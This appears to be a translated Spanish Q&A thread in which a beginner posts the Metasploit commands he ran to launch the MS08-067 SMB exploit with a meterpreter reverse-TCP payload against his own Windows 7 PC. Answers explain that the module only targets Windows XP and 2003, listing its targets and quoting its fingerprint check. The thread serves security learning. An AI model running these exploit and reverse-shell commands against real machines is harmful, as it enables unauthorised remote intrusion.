Problema con el framework Metasploit (kali linux) [ms08_067_netapi]

-2

Soy nuevo en kali linux y solo pruebas de penetración en general. Estoy teniendo un poco de problemas con el marco metasploit para entrar en mi propia PC. He usado este tutorial y obtengo un error que dice "Exploit abort debido a que no hay objetivos", y sin embargo, he proporcionado un objetivo. A continuación hay una lista de los comandos que he usado y el error.

    msf > use windows/smb/ms08_067_netapi
    msf exploit(ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp
    payload => windows/meterpreter/reverse_tcp

    msf exploit(ms08_067_netapi) > set lhost 192.168.0.104
    lhost => 192.168.0.104

    msf exploit(ms08_067_netapi) > set rhost 192.168.0.105
    rhost => 192.168.0.105

    msf exploit(ms08_067_netapi) > set lport 4444
    lport => 4444

    msf exploit(ms08_067_netapi) > set rport 445
    rport => 445

    msf exploit(ms08_067_netapi) > exploit

    [*] Started reverse TCP handler on 192.168.0.104:4444 
    [*] Automatically detecting the target...
    [*] Fingerprint: Windows 7 - Service Pack 1 - lang:Unknown
    [*] We could not detect the language pack, defaulting to English
    [-] Exploit aborted due to failure: no-target: No matching target
    [*] Exploit completed, but no session was created. 

[actualizar] aquí está la salida de 'mostrar opciones'

    Module options (exploit/windows/smb/ms08_067_netapi):

       Name     Current Setting  Required  Description
       ----     ---------------  --------  -----------
       RHOST    192.168.0.105    yes       The target address
       RPORT    445              yes       Set the SMB service port
       SMBPIPE  BROWSER          yes       The pipe name to use (BROWSER, SRVSVC)


    Payload options (windows/meterpreter/reverse_tcp):

       Name      Current Setting  Required  Description
       ----      ---------------  --------  -----------
       EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
       LHOST     192.168.0.104    yes       The listen address
       LPORT     4444             yes       The listen port


    Exploit target:

       Id  Name
       --  ----
       0   Automatic Targeting
    
pregunta Kevin Zoltany 30.06.2016 - 10:34
fuente

2 respuestas

4

Windows 7 SP1 no debería ser vulnerable a ms08_067. Puede ver qué metasplanit de objetivos admite con el comando show targets . Esta es la lista que tengo en mi caja kali:

Exploit targets:

   Id  Name
   --  ----
   0   Automatic Targeting
   1   Windows 2000 Universal
   2   Windows XP SP0/SP1 Universal
   3   Windows 2003 SP0 Universal
   4   Windows XP SP2 English (AlwaysOn NX)
   5   Windows XP SP2 English (NX)
   6   Windows XP SP3 English (AlwaysOn NX)
   7   Windows XP SP3 English (NX)
   8   Windows XP SP2 Arabic (NX)
   9   Windows XP SP2 Chinese - Traditional / Taiwan (NX)
   10  Windows XP SP2 Chinese - Simplified (NX)
   11  Windows XP SP2 Chinese - Traditional (NX)
   12  Windows XP SP2 Czech (NX)
   13  Windows XP SP2 Danish (NX)
   14  Windows XP SP2 German (NX)
   15  Windows XP SP2 Greek (NX)
   16  Windows XP SP2 Spanish (NX)
   17  Windows XP SP2 Finnish (NX)
   18  Windows XP SP2 French (NX)
   19  Windows XP SP2 Hebrew (NX)
   20  Windows XP SP2 Hungarian (NX)
   21  Windows XP SP2 Italian (NX)
   22  Windows XP SP2 Japanese (NX)
   23  Windows XP SP2 Korean (NX)
   24  Windows XP SP2 Dutch (NX)
   25  Windows XP SP2 Norwegian (NX)
   26  Windows XP SP2 Polish (NX)
   27  Windows XP SP2 Portuguese - Brazilian (NX)
   28  Windows XP SP2 Portuguese (NX)
   29  Windows XP SP2 Russian (NX)
   30  Windows XP SP2 Swedish (NX)
   31  Windows XP SP2 Turkish (NX)
   32  Windows XP SP3 Arabic (NX)
   33  Windows XP SP3 Chinese - Traditional / Taiwan (NX)
   34  Windows XP SP3 Chinese - Simplified (NX)
   35  Windows XP SP3 Chinese - Traditional (NX)
   36  Windows XP SP3 Czech (NX)
   37  Windows XP SP3 Danish (NX)
   38  Windows XP SP3 German (NX)
   39  Windows XP SP3 Greek (NX)
   40  Windows XP SP3 Spanish (NX)
   41  Windows XP SP3 Finnish (NX)
   42  Windows XP SP3 French (NX)
   43  Windows XP SP3 Hebrew (NX)
   44  Windows XP SP3 Hungarian (NX)
   45  Windows XP SP3 Italian (NX)
   46  Windows XP SP3 Japanese (NX)
   47  Windows XP SP3 Korean (NX)
   48  Windows XP SP3 Dutch (NX)
   49  Windows XP SP3 Norwegian (NX)
   50  Windows XP SP3 Polish (NX)
   51  Windows XP SP3 Portuguese - Brazilian (NX)
   52  Windows XP SP3 Portuguese (NX)
   53  Windows XP SP3 Russian (NX)
   54  Windows XP SP3 Swedish (NX)
   55  Windows XP SP3 Turkish (NX)
   56  Windows 2003 SP1 English (NO NX)
   57  Windows 2003 SP1 English (NX)
   58  Windows 2003 SP1 Japanese (NO NX)
   59  Windows 2003 SP1 Spanish (NO NX)
   60  Windows 2003 SP1 Spanish (NX)
   61  Windows 2003 SP1 French (NO NX)
   62  Windows 2003 SP1 French (NX)
   63  Windows 2003 SP2 English (NO NX)
   64  Windows 2003 SP2 English (NX)
   65  Windows 2003 SP2 German (NO NX)
   66  Windows 2003 SP2 German (NX)
   67  Windows 2003 SP2 Portuguese - Brazilian (NX)
   68  Windows 2003 SP2 Spanish (NO NX)
   69  Windows 2003 SP2 Spanish (NX)
   70  Windows 2003 SP2 Japanese (NO NX)
   71  Windows 2003 SP2 French (NO NX)
   72  Windows 2003 SP2 French (NX)
    
respondido por el wireghoul 30.06.2016 - 13:23
fuente
1

Windows 7 no es vulnerable a esta vulnerabilidad como se menciona aquí . Este exploit solo funciona en los objetivos mencionados en el código. Ir a través del código de explotación, se puede ver que solo se menciona Windows 2003 y se menciona Windows XP.

Eche un vistazo al fragmento de código que devuelve el mensaje de error que se muestra en su terminal. También puede ver el código en github Aquí

  

print_status ('Detectando automáticamente el objetivo ...')         fprint = smb_fingerprint

  print_status("Fingerprint: #{fprint['os']} - #{fprint['sp']} - lang:#{fprint['lang']}")

  # Bail early on unknown OS
  if (fprint['os'] == 'Unknown')
    fail_with(Failure::NoTarget, 'No matching target')
  end

Aquí puede ver cuándo devolverá el mensaje de error "No se encontró un destino que coincida", cuando no se detecte la versión del sistema operativo necesaria para aprovechar esta vulnerabilidad. Entonces, para explotar, la víctima debería estar ejecutando Windows XP o Windows 2003.

    
respondido por el P4cK3tHuNt3R 30.06.2016 - 13:24
fuente

Lea otras preguntas en las etiquetas